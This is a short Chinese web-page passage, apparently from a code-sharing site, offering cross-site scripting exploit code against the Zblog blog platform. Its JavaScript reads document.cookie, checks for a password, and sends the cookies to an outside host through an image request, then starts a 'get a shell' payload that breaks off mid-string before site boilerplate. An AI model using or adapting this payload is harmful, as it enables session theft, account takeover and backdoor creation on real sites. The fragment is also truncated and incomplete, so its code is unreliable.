Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf(‘password’)==-1?0:1;
tolocation=’https://www.haodaima.com/’;
//get cookie
x=new Image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txaContent=
以上就是Zblog最新跨站漏洞及如何利用代码。自己喜欢的日子,就是最美的日子;适合自己的活法,就是最好的活法。更多关于Zblog最新跨站漏洞及如何利用代码请关注haodaima.com其它相关文章!